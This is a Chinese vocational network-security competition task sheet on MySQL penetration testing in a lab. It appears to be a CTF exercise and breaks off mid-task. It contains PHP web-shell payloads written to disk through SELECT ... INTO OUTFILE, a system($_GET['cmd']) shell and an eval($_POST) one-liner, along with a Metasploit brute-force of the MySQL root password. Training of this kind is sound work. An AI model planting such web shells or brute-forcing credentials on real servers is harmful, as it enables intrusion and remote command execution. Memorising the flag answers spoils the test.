2022年全国职业院校技能大赛（中职组）网络安全竞赛试题——MYSQL安全测试解析（详细）

B-3任务三：MYSQL安全测试

*任务说明：仅能获取Server3的IP地址

1.利用渗透机场景kali中的工具确定MySQL的端口，将MySQL端口作为Flag值提交；

2.管理者曾在web界面登陆数据库，并执行了select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'C:/phpstudy/test1.php'语句，结合本执行语句使用dos命令查看服务器的详细配置信息，并将服务器的系统型号作为Flag值提交；

3.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将破解MySQL的密码所需的模块当作Flag值 (账户为root) 提交;

4.利用渗透机场景kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码，并将MySQL的密码当作Flag值 (账户为root) 提交;

5.利用上题中的数据库账户密码在登陆数据库，通过select '<?php @eval($_POST[admin]);?>'************ 'C: